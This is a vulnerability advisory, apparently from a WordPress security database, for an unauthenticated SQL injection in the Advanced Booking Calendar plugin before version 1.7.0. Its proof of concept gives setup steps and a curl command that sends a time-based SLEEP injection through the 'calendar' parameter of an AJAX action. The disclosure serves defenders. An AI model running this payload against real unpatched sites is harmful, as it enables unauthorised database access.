WordPress Plugin Vulnerabilities
Advanced Booking Calendar < 1.7.0 - Unauthenticated SQL Injection
Description
The plugin does not validate and escape the calendar parameter before using it in a SQL statement via the abc_booking_getSingleCalendar AJAX action (available to both unauthenticated and authenticated users), leading to an unauthenticated SQL injection
Proof of Concept
1. Install the vulnerable plugin (advanced-booking-calendar version 1.6.9) 2. Create a new calendar (the specific configuration shouldn't matter - we just need the shortcode) 3. Create a new page with the shortcode you receive when you finish creating a calendar 4. Visit the just created page and extract the nonce (search for abc_nonce in the source) 5. Invoke the following command to induce a 5 second sleep curl -i http://example.com/wp-admin/admin-ajax.php --data 'action=abc_booking_getSingleCalendar&abc_nonce=7d55255d19&uniqid=620ff6dacd7f8&month=3&calendar=(SELECT 4061 FROM (SELECT(SLEEP(5)))GjRo)' Note: + "abc_nonce" is the required nonce + "uniqid" can be a random string + "month" should be provided and be a valid int (a month in a year) + "calendar" is the injection point
Affects Plugins
Fixed in version 1.7.0
References
Classification
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-02-28 (about 9 months ago)
Added
2022-02-28 (about 9 months ago)
Last Updated
2022-04-16 (about 7 months ago)